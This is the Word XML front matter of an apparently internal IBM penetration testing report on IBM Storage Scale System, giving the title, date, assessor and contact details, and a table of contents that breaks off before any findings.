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5E5021" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1000" w:after="600"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>IBM Storage Scale System (SSS) and Storage Scale  Penetration Testing Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5857D4F3" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6474303A" wp14:editId="586B12CF">
            <wp:extent cx="6350000" cy="1270000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="Drawing 3" descr="ptclargelogo"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 3" descr="ptclargelogo"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6350000" cy="1270000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C914FFC" w14:textId="4171DAA1" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="300" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4D99D2"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Detailed report for the Network, Containers/PODs and CLI </w:t>
      </w:r>
      <w:r w:rsidR="004852A1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4D99D2"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4D99D2"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>enetration testing performed by PTC for IBM Storage Scale System (SSS) and Storage Scale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB64AFE" w14:textId="021466D9" w:rsidR="009604BC" w:rsidRDefault="00825109">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="ABABAB"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Date: Wed Jun 12 11:50:48 IST 2025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4567C0F3" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="ABABAB"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Client Contact: praygupt@in.ibm.com, Ratan.Swami@ibm.com, faryarag@in.ibm.com, sumitkuo@in.ibm.com, ravisure@in.ibm.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3861F97A" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="ABABAB"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Report Prepared By: K V, Praveen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AC96F0" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752731F4" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ASSESSOR TEAM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB44364" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="999999"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>K V, Praveen[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="999999"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>OSCP,eWPT,eWPTX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="999999"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8A46F1" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="999999"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Penetration Tester/Ethical Hacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD06FE1" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="999999"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>praveenkv@in.ibm.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7360ECE4" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E2794D7" w14:textId="4A99D4AC" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="999999"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Kaur, Ramandeep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F85C336" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="999999"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Penetration Tester/Ethical Hacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099ED6EC" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="999999"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>rakaur08@in.ibm.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C09BCB2" w14:textId="3FFEE468" w:rsidR="00E75B86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DF26A3" w14:textId="2144EB75" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>REPORT QA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DA0505" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="999999"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>S, Arun</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFF6770" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="999999"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Technical Lead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3224182A" w14:textId="13D47165" w:rsidR="009604BC" w:rsidRDefault="00000000" w:rsidP="00131B34">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="999999"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>aruns014@in.ibm.com</w:t>
      </w:r>
      <w:r w:rsidR="00131B34">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="999999"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00131B34">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="999999"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00131B34">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="999999"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00131B34">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="999999"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4D99D2"/>
          <w:sz w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>https://w3.ibm.com/w3publisher/ptc/security-services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CF4183" w14:textId="77777777" w:rsidR="00F73A60" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Table of Contents</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText>TOC  "1-3" \h \z \u</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1117C1" w14:textId="12581460" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562818" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>Disclaimer</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc200562818 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3CC926CC" w14:textId="53351F76" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562819" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>IBM Confidential</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc200562819 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0BE2383B" w14:textId="2C6380C7" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562820" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>Copyright</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc200562820 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0093D3EE" w14:textId="1EAB86AC" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562821" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>TESTING METHODOLOGY</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc200562821 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4235F02F" w14:textId="61C125A3" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562822" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>EXECUTIVE SUMMARY</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc200562822 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2A4C00AF" w14:textId="73E9E4F4" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562823" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>Overview</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc200562823 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="40C31510" w14:textId="2275706E" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562824" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>Timeline</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc200562824 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="170BD856" w14:textId="1CB6106E" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562825" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>Summary of Findings by Severity</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc200562825 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3C7726B2" w14:textId="2FDE6D11" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC4"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562826" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>Overall Security Vulnerability Snapshot</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc200562826 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
